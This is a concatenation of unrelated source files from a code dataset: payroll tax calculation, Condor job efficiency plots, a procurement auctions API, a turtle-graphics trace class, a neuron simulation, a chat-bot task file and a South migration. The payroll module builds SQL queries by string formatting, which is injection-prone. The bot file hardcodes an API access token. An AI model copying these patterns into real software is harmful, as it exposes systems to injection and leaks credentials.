payroll_period='{1}' and submission_date between '{2}' and '{3}'""".format(self.employee,
payroll_period.name, payroll_period.start_date, self.end_date))
if sum_exemption and sum_exemption[0][0]:
total_exemption_amount = sum_exemption[0][0]
total_taxable_earning -= total_exemption_amount
return total_taxable_earning
def get_total_additional_income(self, from_date):
total_additional_pay = 0
sum_additional_earning = frappe.db.sql("""select sum(sd.amount) from `tabSalary Detail` sd join
`tabSalary Slip` ss on sd.parent=ss.name where sd.parentfield='earnings'
and sd.is_tax_applicable=1 and is_additional_component=1 and is_flexible_benefit=0
and ss.docstatus=1 and ss.employee='{0}' and ss.start_date between '{1}' and '{2}'
and ss.end_date between '{1}' and '{2}'""".format(self.employee,
from_date, self.start_date))
if sum_additional_earning and sum_additional_earning[0][0]:
total_additional_pay = sum_additional_earning[0][0]
return total_additional_pay
def get_tax_paid_in_period(self, payroll_period, tax_component, only_total=False):
# find total_tax_paid, tax paid for benefit, additional_salary
sum_tax_paid = frappe.db.sql("""select sum(sd.amount), sum(tax_on_flexible_benefit),
sum(tax_on_additional_salary) from `tabSalary Detail` sd join `tabSalary Slip`
ss on sd.parent=ss.name where sd.parentfield='deductions' and sd.salary_component='{3}'
and sd.variable_based_on_taxable_salary=1 and ss.docstatus=1 and ss.employee='{0}'
and ss.start_date between '{1}' and '{2}' and ss.end_date between '{1}' and
'{2}'""".format(self.employee, payroll_period.start_date, self.start_date, tax_component))
if sum_tax_paid and sum_tax_paid[0][0]:
return {'total_tax_paid': sum_tax_paid[0][0], 'benefit_tax':sum_tax_paid[0][1], 'additional_tax': sum_tax_paid[0][2]}
def get_taxable_earnings(self, include_flexi=0, only_flexi=0):
taxable_earning = 0
additional_income = 0
for earning in self.earnings:
if earning.is_tax_applicable:
if earning.is_additional_component:
additional_income += earning.amount
continue
if only_flexi:
if earning.is_tax_applicable and earning.is_flexible_benefit:
taxable_earning += earning.amount
continue
if include_flexi:
if earning.is_tax_applicable or (earning.is_tax_applicable and earning.is_flexible_benefit):
taxable_earning += earning.amount
else:
if earning.is_tax_applicable and not earning.is_flexible_benefit:
taxable_earning += earning.amount
return {"taxable_earning": taxable_earning, "additional_income": additional_income}
def calculate_tax(self, args):
tax_amount, benefit_tax, additional_tax = 0, 0, 0
annual_taxable_earning = args.get("annual_taxable_earning")
benefit_to_tax = args.get("unclaimed_benefit")
additional_income = args.get("additional_income")
# Get tax calc by period
annual_tax = self.calculate_tax_by_tax_slab(args.get("payroll_period"), annual_taxable_earning)
# Calc prorata tax
tax_amount = annual_tax / args.get("period_factor")
# Benefit is a part of Salary Structure, add the tax diff, update annual_tax
if benefit_to_tax > 0:
annual_taxable_earning += benefit_to_tax
annual_tax_with_benefit_income = self.calculate_tax_by_tax_slab(
args.get("payroll_period"), annual_taxable_earning)
benefit_tax = annual_tax_with_benefit_income - annual_tax - args.get("benefit_tax_paid")
tax_amount += benefit_tax
annual_tax = annual_tax_with_benefit_income
# find the annual tax diff caused by additional_income, add to tax_amount
if additional_income > 0:
annual_tax_with_additional_income = self.calculate_tax_by_tax_slab(
args.get("payroll_period"), annual_taxable_earning + additional_income)
additional_tax = annual_tax_with_additional_income - annual_tax - args.get("additional_tax_paid")
tax_amount += additional_tax
# less paid taxes
if args.get("pro_rata_tax_paid"):
tax_amount -= args.get("pro_rata_tax_paid")
struct_row = self.get_salary_slip_row(args.get("tax_component"))
return [struct_row, tax_amount, benefit_tax, additional_tax]
def calculate_tax_by_tax_slab(self, payroll_period, annual_earning):
payroll_period_obj = frappe.get_doc("Payroll Period", payroll_period)
data = self.get_data_for_eval()
taxable_amount = 0
for slab in payroll_period_obj.taxable_salary_slabs:
if slab.condition and not self.eval_tax_slab_condition(slab.condition, data):
continue
if not slab.to_amount and annual_earning > slab.from_amount:
taxable_amount += (annual_earning - slab.from_amount) * slab.percent_deduction *.01
continue
if annual_earning > slab.from_amount and annual_earning <= slab.to_amount:
taxable_amount += (annual_earning - slab.from_amount) * slab.percent_deduction *.01
elif annual_earning > slab.from_amount and annual_earning > slab.to_amount:
taxable_amount += (slab.to_amount - slab.from_amount) * slab.percent_deduction * .01
return taxable_amount
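# Worked example (assumed slabs, not from the original file): with slabs
# 0-250000 at 0% and 250000-500000 at 5%, annual_earning = 400000 falls
# inside the second slab, so the tax returned is
# (400000 - 250000) * 5 * 0.01 = 7500.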
def eval_tax_slab_condition(self, condition, data):
try:
condition = condition.strip()
if condition:
return frappe.safe_eval(condition, self.whitelisted_globals, data)
except NameError as err:
frappe.throw(_("Name error: {0}".format(err)))
except SyntaxError as err:
frappe.throw(_("Syntax error in condition: {0}".format(err)))
except Exception as e:
frappe.throw(_("Error in formula or condition: {0}".format(e)))
raise
def get_period_factor(self, period_start, period_end, start_date=None, end_date=None):
# TODO if both deduct checked update the factor to make tax consistent
payroll_days = date_diff(period_end, period_start) + 1
if start_date and end_date:
salary_days = date_diff(end_date, start_date) + 1
return flt(payroll_days)/flt(salary_days)
# if period configured for a year and monthly frequency return 12 to make tax calc consistent
if 360 <= payroll_days <= 370 and self.payroll_frequency == "Monthly":
return 12
salary_days = date_diff(self.end_date, self.start_date) + 1
return flt(payroll_days)/flt(salary_days)
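# Worked example (read from the logic above): an annual payroll period of
# 365 days with a Monthly slip returns 12, so a monthly taxable earning of
# 50000 annualises to 600000; with explicit start/end dates spanning 30
# days, the factor would instead be 365/30, roughly 12.17.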
def get_salary_slip_row(self, salary_component):
component = frappe.get_doc("Salary Component", salary_component)
# Data for update_component_row
struct_row = {}
struct_row['depends_on_lwp'] = component.depends_on_lwp
struct_row['salary_component'] = component.name
struct_row['abbr'] = component.salary_component_abbr
struct_row['do_not_include_in_total'] = component.do_not_include_in_total
struct_row['is_tax_applicable'] = component.is_tax_applicable
struct_row['is_flexible_benefit'] = component.is_flexible_benefit
struct_row['variable_based_on_taxable_salary'] = component.variable_based_on_taxable_salary
return struct_row
def unlink_ref_doc_from_salary_slip(ref_no):
linked_ss = frappe.db.sql_list("""select name from `tabSalary Slip`
where journal_entry=%s and docstatus < 2""", (ref_no))
if linked_ss:
for ss in linked_ss:
ss_doc = frappe.get_doc("Salary Slip", ss)
frappe.db.set_value("Salary Slip", ss_doc.name, "journal_entry", "")
|
gpl-3.0
| 4,243,228,669,414,350,300
| 42.415212
| 176
| 0.711881
| false
| 2.979293
| false
| false
| false
|
SISC2014/JobAnalysis
|
MongoRetrieval/src/EfficiencyHistogram.py
|
1
|
6076
|
'''
Created on Jun 19, 2014
@author: Erik Halperin
List of Keys
_id
JobStartDate
Requirements
TransferInput
TotalSuspensions
LastJobStatus
BufferBlockSize
OrigMaxHosts
RequestMemory
WantRemoteSyscalls
LastHoldReasonCode
ExitStatus
Args
JobFinishedHookDone
JobCurrentStartDate
CompletionDate
JobLeaseDuration
Err
RemoteWallClockTime
JobUniverse
RequestCpus
RemoveReason
StreamErr
Rank
WantRemoteIO
LocalSysCpu
UsedOCWrapper
CumulativeSlotTime
TransferIn
MachineAttrCpus0
CondorPlatform
CurrentTime
ExitReason
StreamOut
WantCheckpoint
GlobalJobId
TransferInputSizeMB
JobStatus
LastPublicClaimId
MemoryUsage
NumSystemHolds
TransferOutput
PeriodicRemove
NumShadowStarts
LastHoldReasonSubCode
LastSuspensionTime
ShouldTransferFiles
QDate
RemoteSysCpu
ImageSize_RAW
LastRemoteHost
CondorVersion
DiskUsage_RAW
PeriodicRelease
NumCkpts_RAW
JobCurrentStartExecutingDate
ProjectName
CoreSize
RemoteUserCpu
BytesSent
Owner
BytesRecvd
ExitCode
NumJobStarts
ExecutableSize_RAW
Notification
ExecutableSize
Environment
StartdPrincipal
RootDir
MinHosts
CumulativeSuspensionTime
JOBGLIDEIN_ResourceName
ProcId
MATCH_EXP_JOBGLIDEIN_ResourceName
OnExitRemove
User
UserLog
CommittedSuspensionTime
NumRestarts
JobCoreDumped
Cmd
NumJobMatches
DiskUsage
LastRemotePool
CommittedSlotTime
ResidentSetSize
WhenToTransferOutput
ExitBySignal
Out
RequestDisk
ImageSize
NumCkpts
LastJobLeaseRenewal
MachineAttrSlotWeight0
ResidentSetSize_RAW
JobPrio
JobRunCount
PeriodicHold
ClusterId
NiceUser
MyType
LocalUserCpu
BufferSize
LastHoldReason
CurrentHosts
LeaveJobInQueue
OnExitHold
EnteredCurrentStatus
MaxHosts
CommittedTime
LastMatchTime
In
JobNotification
'''
import re
import matplotlib.pyplot as plt
from pymongo import MongoClient
#takes a list of dictionaries and returns a list of floats
def parseList(l):
l = map(str, l)
newlist = []
for k in l:
newlist.append(re.sub('[RemoteWallClockTimeUsrpu_id\"\'{}: ]', '', k))
newlist = map(float, newlist)
return list(newlist)
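# Illustrative usage (input shape assumed from the queries below): a result
# such as [{'RemoteUserCpu': 12.5}] is stringified, stripped of key names
# and punctuation by the regex, and converted to floats:
# parseList([{'RemoteUserCpu': 12.5}]) -> [12.5]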
#returns a list of dictionaries
#item is from list of keys, username: "example@login01.osgconnect.net", cluster: "123456", site: "phys.ucconn.edu",
#coll: MongoDB collection
#username/cluster/site may be None, in which case they will not be used
#item should be _id
def dbFindItemFromUser(item, username, cluster, site, coll):
mylist = []
rgx = "$regex"
if(username != None):
username = '\"' + username + '\"'
dicU = {'User': username }
else:
dicU = {}
if(cluster != None):
dicC = { 'ClusterId': cluster }
else:
dicC = {}
if(site != None):
dicS = { 'LastRemoteHost': { rgx: site } }
else:
dicS = {}
dicU.update(dicC)
dicU.update(dicS)
pr = { item: 1, '_id': 0 }
for condor_history in coll.find(dicU, pr):
mylist.append(condor_history)
return mylist
#returns a list of dictionaries
#username and coll are same as above
def dbFindIdFromUser(username, coll):
mylist = []
username = '\"' + username + '\"'
cr = { 'User': username }
pr = { '_id': 1 }
for condor_history in coll.find(cr, pr):
mylist.append(condor_history)
return mylist
#creates a scatterplot of two items
def plotScatter(item1, item2, username, cluster, coll, xlab, ylab, title):
lst1 = parseList(dbFindItemFromUser(item1, username, cluster, None, coll))
lst2 = parseList(dbFindItemFromUser(item2, username, cluster, None, coll))
plt.plot(lst1, lst2, 'bo')
plt.xlabel(xlab)
plt.ylabel(ylab)
plt.title(title)
plt.show()
#creates a histogram of a list
#l: list to plot, bs: number of bins
def plotHist(l, bs, xlab, ylab, title):
plt.hist(l, bins=bs)
plt.title(title)
plt.xlabel(xlab)
plt.ylabel(ylab)
plt.show()
def getEfficiency(username, cluster, site, coll):
ruc = parseList(dbFindItemFromUser("RemoteUserCpu", username, cluster, site, coll))
rwct = parseList(dbFindItemFromUser("RemoteWallClockTime", username, cluster, site, coll))
efflist = []
totcount = 0
goodcount = 0 #certain efficiency values are >1 due to a condor error. these values are discarded
zerocount = 0 #testing possible condor bug where RemoteUserCpu is 0 but RemoteWallClockTime is quite large
for x,y in zip(ruc, rwct):
if(y == 0):
totcount += 1
elif(x/y > 1):
totcount += 1
else:
if(x == 0):
zerocount +=1
efflist.append(x/y)
totcount += 1
goodcount +=1
return [efflist, goodcount, totcount]
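# Illustrative note: a job with RemoteUserCpu = 3600 and
# RemoteWallClockTime = 7200 contributes an efficiency of 0.5; jobs with
# zero wall-clock time or ratios above 1 (the condor artifact mentioned
# above) are counted in totcount but excluded from the plot.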
#Given at least one input for username/cluster/site, creates a histogram of the RemoteUserCpu/RemoteWallClockTime for the results
def efficiencyHistogram(username, cluster, site, coll, bins, xlab, ylab, title):
retlist = getEfficiency(username, cluster, site, coll) #0: efflist, 1: goodcount, 2: totcount
print("Jobs Plotted:", retlist[1], "/", retlist[2])
plotHist(retlist[0], bins, xlab, ylab, title)
def fourEffHists(lst1, lst2, lst3, lst4, lab1, lab2, lab3, lab4, bs, xlab, ylab, title):
plt.hist(lst1, bins=bs, histtype='stepfilled', label=lab1)
plt.hist(lst2, bins=bs, histtype='stepfilled', label=lab2)
plt.hist(lst3, bins=bs, histtype='stepfilled', label=lab3)
plt.hist(lst4, bins=bs, histtype='stepfilled', label=lab4)
plt.title(title)
plt.xlabel(xlab)
plt.ylabel(ylab)
plt.legend()
plt.show()
def mainEH(host, port):
client = MongoClient(host, port)
db = client.condor_history
coll = db.history_records
#sites: uc.mwt2.org, phys.uconn.edu, hpc.smu.edu, usatlas.bnl.gov
#names (@login01.osgconnect.net): lfzhao, sthapa, echism, wcatino, bamitchell
str_name = "bamitchell@login01.osgconnect.net"
efficiencyHistogram(str_name, None, None, coll, 75, "UserCPU/WallClockTime", "Frequency", "Efficiencies for " + str_name)
mainEH('mc.mwt2.org', 27017)
|
mit
| 4,049,639,096,715,589,000
| 22.46332
| 129
| 0.697334
| false
| 3.295011
| false
| false
| false
|
openprocurement/openprocurement.edge
|
openprocurement/edge/views/auctions.py
|
1
|
7066
|
# -*- coding: utf-8 -*-
from functools import partial
from openprocurement.edge.utils import (
context_unpack,
decrypt,
encrypt,
APIResource,
json_view
)
from openprocurement.edge.utils import eaopresource
from openprocurement.edge.design import (
by_dateModified_view_ViewDefinition,
real_by_dateModified_view_ViewDefinition,
test_by_dateModified_view_ViewDefinition,
by_local_seq_view_ViewDefinition,
real_by_local_seq_view_ViewDefinition,
test_by_local_seq_view_ViewDefinition,
)
from openprocurement.edge.design import AUCTION_FIELDS as FIELDS
VIEW_MAP = {
u'': real_by_dateModified_view_ViewDefinition('auctions'),
u'test': test_by_dateModified_view_ViewDefinition('auctions'),
u'_all_': by_dateModified_view_ViewDefinition('auctions'),
}
CHANGES_VIEW_MAP = {
u'': real_by_local_seq_view_ViewDefinition('auctions'),
u'test': test_by_local_seq_view_ViewDefinition('auctions'),
u'_all_': by_local_seq_view_ViewDefinition('auctions'),
}
FEED = {
u'dateModified': VIEW_MAP,
u'changes': CHANGES_VIEW_MAP,
}
@eaopresource(name='Auctions',
path='/auctions',
description="Open Contracting compatible data exchange format. See http://ocds.open-contracting.org/standard/r/master/#auction for more info")
class AuctionsResource(APIResource):
def __init__(self, request, context):
super(AuctionsResource, self).__init__(request, context)
self.server = request.registry.couchdb_server
self.update_after = request.registry.update_after
@json_view()
def get(self):
"""Auctions List
Get Auctions List
----------------
Example request to get auctions list:
.. sourcecode:: http
GET /auctions HTTP/1.1
Host: example.com
Accept: application/json
This is what one should expect in response:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"data": [
{
"id": "64e93250be76435397e8c992ed4214d1",
"dateModified": "2014-10-27T08:06:58.158Z"
}
]
}
"""
# http://wiki.apache.org/couchdb/HTTP_view_API#Querying_Options
params = {}
pparams = {}
fields = self.request.params.get('opt_fields', '')
if fields:
params['opt_fields'] = fields
pparams['opt_fields'] = fields
fields = fields.split(',')
view_fields = fields + ['dateModified', 'id']
limit = self.request.params.get('limit', '')
if limit:
params['limit'] = limit
pparams['limit'] = limit
limit = int(limit) if limit.isdigit() and 1000 >= int(limit) > 0 else 100
descending = bool(self.request.params.get('descending'))
offset = self.request.params.get('offset', '')
if descending:
params['descending'] = 1
else:
pparams['descending'] = 1
feed = self.request.params.get('feed', '')
view_map = FEED.get(feed, VIEW_MAP)
changes = view_map is CHANGES_VIEW_MAP
if feed and feed in FEED:
params['feed'] = feed
pparams['feed'] = feed
mode = self.request.params.get('mode', '')
if mode and mode in view_map:
params['mode'] = mode
pparams['mode'] = mode
view_limit = limit + 1 if offset else limit
if changes:
if offset:
view_offset = decrypt(self.server.uuid, self.db.name, offset)
if view_offset and view_offset.isdigit():
view_offset = int(view_offset)
else:
self.request.errors.add('params', 'offset', 'Offset expired/invalid')
self.request.errors.status = 404
return
if not offset:
view_offset = 'now' if descending else 0
else:
if offset:
view_offset = offset
else:
view_offset = '9' if descending else ''
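# Note (read from the logic above and the encrypt/decrypt calls below):
# for the 'changes' feed the offset is a CouchDB update sequence number,
# encrypted before being handed back to the client; for the dateModified
# feed the offset is the raw dateModified key, with '9' and '' acting as
# high/low sentinels when paging descending or ascending.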
list_view = view_map.get(mode, view_map[u''])
if self.update_after:
view = partial(list_view, self.db, limit=view_limit, startkey=view_offset, descending=descending, stale='update_after')
else:
view = partial(list_view, self.db, limit=view_limit, startkey=view_offset, descending=descending)
if fields:
if not changes and set(fields).issubset(set(FIELDS)):
results = [
(dict([(i, j) for i, j in x.value.items() + [('id', x.id), ('dateModified', x.key)] if i in view_fields]), x.key)
for x in view()
]
elif changes and set(fields).issubset(set(FIELDS)):
results = [
(dict([(i, j) for i, j in x.value.items() + [('id', x.id)] if i in view_fields]), x.key)
for x in view()
]
elif fields:
self.LOGGER.info('Used custom fields for auctions list: {}'.format(','.join(sorted(fields))),
extra=context_unpack(self.request, {'MESSAGE_ID': 'auction_list_custom'}))
results = [
(dict([(k, j) for k, j in i[u'doc'].items() if k in view_fields]), i.key)
for i in view(include_docs=True)
]
else:
results = [
({'id': i.id, 'dateModified': i.value['dateModified']} if changes else {'id': i.id, 'dateModified': i.key}, i.key)
for i in view()
]
if results:
params['offset'], pparams['offset'] = results[-1][1], results[0][1]
if offset and view_offset == results[0][1]:
results = results[1:]
elif offset and view_offset != results[0][1]:
results = results[:limit]
params['offset'], pparams['offset'] = results[-1][1], view_offset
results = [i[0] for i in results]
if changes:
params['offset'] = encrypt(self.server.uuid, self.db.name, params['offset'])
pparams['offset'] = encrypt(self.server.uuid, self.db.name, pparams['offset'])
else:
params['offset'] = offset
pparams['offset'] = offset
data = {
'data': results,
'next_page': {
"offset": params['offset'],
"path": self.request.route_path('Auctions', _query=params),
"uri": self.request.route_url('Auctions', _query=params)
}
}
if descending or offset:
data['prev_page'] = {
"offset": pparams['offset'],
"path": self.request.route_path('Auctions', _query=pparams),
"uri": self.request.route_url('Auctions', _query=pparams)
}
return data
|
apache-2.0
| -6,018,885,631,503,351,000
| 37.612022
| 154
| 0.538353
| false
| 3.994347
| true
| false
| false
|
IhToN/DAW1-PRG
|
Ejercicios/SeguTrim/Objetos/Punto.py
|
1
|
4377
|
"""
Clase Punto
coord x
coord y
suma(punto)
resta(punto)
Clase Traza
instancias Punto en una Lista
añadir punto
comparar dos trazas (dos trazas serán iguales si sus puntos son iguales)
"""
import math
import turtle
class Punto:
def __init__(self, x=0.0, y=0.0):
self.x = float(x)
self.y = float(y)
def __str__(self):
return "Punto({}, {})".format(self.x, self.y)
def __eq__(self, other):
return (self.x, self.y) == (other.x, other.y)
def suma(self, punto):
""" Devuelve la suma vectorial del punto con otro
"""
return Punto(self.x + punto.x, self.y + punto.y)
def resta(self, punto):
""" Devuelve la resta vectorial del punto con otro
"""
return self.suma(-punto)
def distancia(self, punto):
""" Devuelve la distancia que hay entre un punto y otro
"""
return math.hypot(self.x - punto.x, self.y - punto.y)
class Traza:
def __init__(self, *args):
self.trazado = []
self.i = -1
for arg in args:
if isinstance(arg, Punto):
self.trazado.append(arg)
else:
raise ValueError(arg, "is not a point.")
def __str__(self):
out = ""
for punto in self.trazado:
out += str(punto) + " "
return out
def __eq__(self, other):
return self.trazado == other.trazado
def __next__(self):
self.i += 1
if self.i < len(self.trazado):
return self.trazado[self.i]
else:
raise StopIteration
def __iter__(self):
return self
def add_punto(self, punto):
""" Añade un punto nuevo a la Traza
"""
if isinstance(punto, Punto):
self.trazado.append(punto)
else:
raise ValueError("¡Ioputa, que en las trazas sólo puede haber puntos y no cosas raras!")
def longitud_traza(self):
""" Devuelve la suma de la distancia entre todos los puntos de la traza
"""
ret = 0
for p in range(len(self.trazado) - 1):
ret += self.trazado[p].distancia(self.trazado[p + 1])
return ret
def dump_traza(self, fichero='traza.txt'):
""" Guardamos la traza en un fichero de trazas
"""
fichero = open(fichero, 'w', encoding="utf-8")
for punto in self.trazado:
fichero.write("{},{}\n".format(punto.x, punto.y))
fichero.close()
def load_traza(self, fichero):
try:
fichero = open(fichero, encoding="utf-8")
self.trazado = []
for linea in fichero:
if linea != "":
punto = linea.split(",")
self.add_punto(Punto(punto[0].strip(), punto[1].strip()))
except FileNotFoundError:
print("No existe el fichero.")
def dibuja(self):
tortuga = self.turtle
tortuga.down()
for punto in self.trazado:
tortuga.setpos(punto.x, punto.y)
tortuga.up()
def toggle_capture(self):
"""Activamos o desactivamos el modo captura, según toque"""
self.capture_mode = not self.capture_mode
if not self.capture_mode:
self.turtle.reset()
self.turtle.up()
self.turtle.setpos(self.trazado[0].x, self.trazado[0].y)
self.dibuja()
fichero = self.screen.textinput("Save Trace", "Enter the file name:")
self.dump_traza(fichero + ".txt")
print(self)
def move_turtle(self, x, y):
"""Si estamos en modo captura, movemos la tortuga y vamos guardando los puntos"""
tortuga = self.turtle
if self.capture_mode:
tortuga.setheading(tortuga.towards(x, y))
tortuga.setpos(x, y)
self.add_punto(Punto(x, y))
def test():
p = Punto(3, 0)
k = Punto(0, 4)
tr = Traza(p, k)
print(tr)
tr.dump_traza("traza.txt")
tr.load_traza("traza.txt")
print(tr)
s = turtle.Screen()
t = turtle.Turtle()
tr.turtle = t
tr.screen = s
tr.capture_mode = False
s.onkey(tr.toggle_capture, 'space')
s.onclick(tr.move_turtle)
s.listen()
tr.dibuja()
turtle.done()
tr.dump_traza("traza.txt")
test()
|
apache-2.0
| -7,849,022,810,489,935,000
| 25.815951
| 100
| 0.538778
| false
| 3.133333
| false
| false
| false
|
pmediano/ComputationalNeurodynamics
|
Fall2016/Exercise_1/Solutions/IzNeuronRK4.py
|
1
|
1897
|
"""
Computational Neurodynamics
Exercise 1
Simulates Izhikevich's neuron model using the Runge-Kutta 4 method.
Parameters for regular spiking, fast spiking and bursting
neurons extracted from:
http://www.izhikevich.org/publications/spikes.htm
(C) Murray Shanahan et al, 2016
"""
import numpy as np
import matplotlib.pyplot as plt
# Create time points
Tmin = 0
Tmax = 200 # Simulation time
dt = 0.01 # Step size
T = np.arange(Tmin, Tmax+dt, dt)
# Base current
I = 10
## Parameters of Izhikevich's model (regular spiking)
a = 0.02
b = 0.2
c = -65
d = 8
## Parameters of Izhikevich's model (fast spiking)
# a = 0.02
# b = 0.25
# c = -65
# d = 2
## Parameters of Izhikevich's model (bursting)
# a = 0.02
# b = 0.2
# c = -50
# d = 2
## Make a state vector that has a (v, u) pair for each timestep
s = np.zeros((len(T), 2))
## Initial values
s[0, 0] = -65
s[0, 1] = -1
# Note that s1[0] is v, s1[1] is u. This is Izhikevich equation in vector form
def s_dt(s1, I):
v_dt = 0.04*(s1[0]**2) + 5*s1[0] + 140 - s1[1] + I
u_dt = a*(b*s1[0] - s1[1])
return np.array([v_dt, u_dt])
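# Note: the loop below applies the classic fourth-order Runge-Kutta update
# s[t+1] = s[t] + (dt/6)*(k_1 + 2*k_2 + 2*k_3 + k_4), where k_2 and k_3
# are slope estimates at the half step and k_4 at the full step.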
## SIMULATE
for t in range(len(T)-1):
# Calculate the four constants of Runge-Kutta method
k_1 = s_dt(s[t], I)
k_2 = s_dt(s[t] + 0.5*dt*k_1, I)
k_3 = s_dt(s[t] + 0.5*dt*k_2, I)
k_4 = s_dt(s[t] + dt*k_3, I)
s[t+1] = s[t] + (1.0/6)*dt*(k_1 + 2*k_2 + 2*k_3 + k_4)
# Reset the neuron if it has spiked
if s[t+1, 0] >= 30:
s[t, 0] = 30 # Add a Dirac pulse for visualisation
s[t+1, 0] = c # Reset to resting potential
s[t+1, 1] += d # Update recovery variable
v = s[:, 0]
u = s[:, 1]
## Plot the membrane potential
plt.subplot(211)
plt.plot(T, v)
plt.xlabel('Time (ms)')
plt.ylabel('Membrane potential v (mV)')
plt.title('Izhikevich Neuron')
# Plot the reset variable
plt.subplot(212)
plt.plot(T, u)
plt.xlabel('Time (ms)')
plt.ylabel('Reset variable u')
plt.show()
|
gpl-3.0
| 194,822,784,332,023,800
| 19.397849
| 78
| 0.618345
| false
| 2.319071
| false
| false
| false
|
RaminderSinghSahni/micro-ram-bot
|
tasks.py
|
1
|
4411
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from microsoftbotframework import Response
import celery
import os
import sys
import json
# import argparse
from google.cloud import language
import google.auth
# import language
try:
import apiai
except ImportError:
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
import apiai
# CLIENT_ACCESS_TOKEN = 'd18b44be8d0b41269a42704c00d44d77'
CLIENT_ACCESS_TOKEN = '039129d3176644e9ac91464ee9e7b5df'
def respond_to_conversation_update(message):
if message["type"] == "conversationUpdate":
response = Response(message)
message_response = 'Have fun with the Microsoft Bot Framework'
response.reply_to_activity(message_response, recipient={"id": response["conversation"]["id"]})
def echo_response(message):
if message["type"] == "message":
response = Response(message)
message_response = message["text"]
# response_info = response.reply_to_activity("in this")
# response_info = response.reply_to_activity(message_response)
with open('intervention.json') as data_file:
iData = json.load(data_file)
if iData["intervention"] == "0":
ai = apiai.ApiAI(CLIENT_ACCESS_TOKEN)
request1 = ai.text_request()
# request1.lang = 'en' # optional, default value equal 'en'
# request.session_id = "<SESSION ID, UBIQUE FOR EACH USER>"
# print("\n\nYour Input : ",end=" ")
# response.reply_to_activity(ai)
with open('session.json') as data_file:
data = json.load(data_file)
if data["session_id"] != "":
request1.session_id = data["session_id"]
request1.query = message_response
# request1.resetContexts = False
# request1.
# response_info = response.reply_to_activity("hello"+request1)
# print("\n\nBot\'s response :",end=" ")
response1 = request1.getresponse()
responsestr = response1.read().decode('utf-8')
response_obj = json.loads(responsestr)
with open('session.json', 'w') as outfile:
json.dump({"session_id": response_obj["sessionId"]}, outfile)
# print(response_obj["result"]["fulfillment"]["speech"])
response_info = response.reply_to_activity(response_obj["result"]["fulfillment"]["speech"])
else:
with open('message.json') as data_file:
data = json.load(data_file)
if data["message"] != "":
new_response = Response(data["message"])
# language_client = language.Client()
language_client = language.Client.from_service_account_json('Micro-av-bot-1.json')
# language_client = language.client
document = language_client.document_from_text(message_response)
# Detects sentiment in the document.
annotations = document.annotate_text(include_sentiment=True,
include_syntax=False,
include_entities=False)
score = annotations.sentiment.score
magnitude = annotations.sentiment.magnitude
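# Illustrative note (values are examples, not guaranteed): score ranges
# roughly from -1.0 (negative) to 1.0 (positive) and magnitude measures
# overall emotional strength, so a message like "I love this" might score
# around 0.8 with a similar magnitude.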
# response_info = new_response.reply_to_activity('Overall Sentiment: score')
response_info = new_response.reply_to_activity('Overall Sentiment: score of {} with magnitude of {}'.format(score, magnitude))
# response_info = response.reply_to_activity("Intervention is turned on")
# from time import sleep
# sleep(2)
# response.delete_activity(activity_id=response_info.json()['id'])
# sleep(2)
# response.create_conversation('lets talk about something really interesting')
# This is a asynchronous task
@celery.task()
def echo_response_async(message):
if message["type"] == "message":
response = Response(message)
message_response = message["text"]
response.send_to_conversation(message_response)
|
mit
| -5,725,038,473,106,126,000
| 37.692982
| 150
| 0.568579
| false
| 4.261836
| false
| false
| false
|
orlenko/sfpirg
|
sfpirgapp/migrations/0022_auto__del_field_organization_mailing_address__add_field_organization_m.py
|
1
|
25180
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Organization.mailing_address'
db.delete_column(u'sfpirgapp_organization', 'mailing_address_id')
# Adding field 'Organization.mailing_city'
db.add_column(u'sfpirgapp_organization', 'mailing_city',
self.gf('django.db.models.fields.CharField')(default='-', max_length=255),
keep_default=False)
# Adding field 'Organization.mailing_street'
db.add_column(u'sfpirgapp_organization', 'mailing_street',
self.gf('django.db.models.fields.CharField')(default='-', max_length=255),
keep_default=False)
# Adding field 'Organization.mailing_street2'
db.add_column(u'sfpirgapp_organization', 'mailing_street2',
self.gf('django.db.models.fields.CharField')(default='', max_length=255, null=True, blank=True),
keep_default=False)
# Adding field 'Organization.mailing_postal_code'
db.add_column(u'sfpirgapp_organization', 'mailing_postal_code',
self.gf('django.db.models.fields.CharField')(default='-', max_length=255),
keep_default=False)
# Changing field 'Organization.contact_phone'
db.alter_column(u'sfpirgapp_organization', 'contact_phone', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
# Changing field 'Organization.contact_position'
db.alter_column(u'sfpirgapp_organization', 'contact_position', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
# Changing field 'Organization.contact_email'
db.alter_column(u'sfpirgapp_organization', 'contact_email', self.gf('django.db.models.fields.EmailField')(max_length=255, null=True))
# Changing field 'Organization.contact_name'
db.alter_column(u'sfpirgapp_organization', 'contact_name', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
def backwards(self, orm):
# Adding field 'Organization.mailing_address'
db.add_column(u'sfpirgapp_organization', 'mailing_address',
self.gf('django.db.models.fields.related.ForeignKey')(default='-', to=orm['sfpirgapp.Address']),
keep_default=False)
# Deleting field 'Organization.mailing_city'
db.delete_column(u'sfpirgapp_organization', 'mailing_city')
# Deleting field 'Organization.mailing_street'
db.delete_column(u'sfpirgapp_organization', 'mailing_street')
# Deleting field 'Organization.mailing_street2'
db.delete_column(u'sfpirgapp_organization', 'mailing_street2')
# Deleting field 'Organization.mailing_postal_code'
db.delete_column(u'sfpirgapp_organization', 'mailing_postal_code')
# Changing field 'Organization.contact_phone'
db.alter_column(u'sfpirgapp_organization', 'contact_phone', self.gf('django.db.models.fields.CharField')(default='-', max_length=255))
# Changing field 'Organization.contact_position'
db.alter_column(u'sfpirgapp_organization', 'contact_position', self.gf('django.db.models.fields.CharField')(default='-', max_length=255))
# Changing field 'Organization.contact_email'
db.alter_column(u'sfpirgapp_organization', 'contact_email', self.gf('django.db.models.fields.EmailField')(default='-', max_length=255))
# Changing field 'Organization.contact_name'
db.alter_column(u'sfpirgapp_organization', 'contact_name', self.gf('django.db.models.fields.CharField')(default='-', max_length=255))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
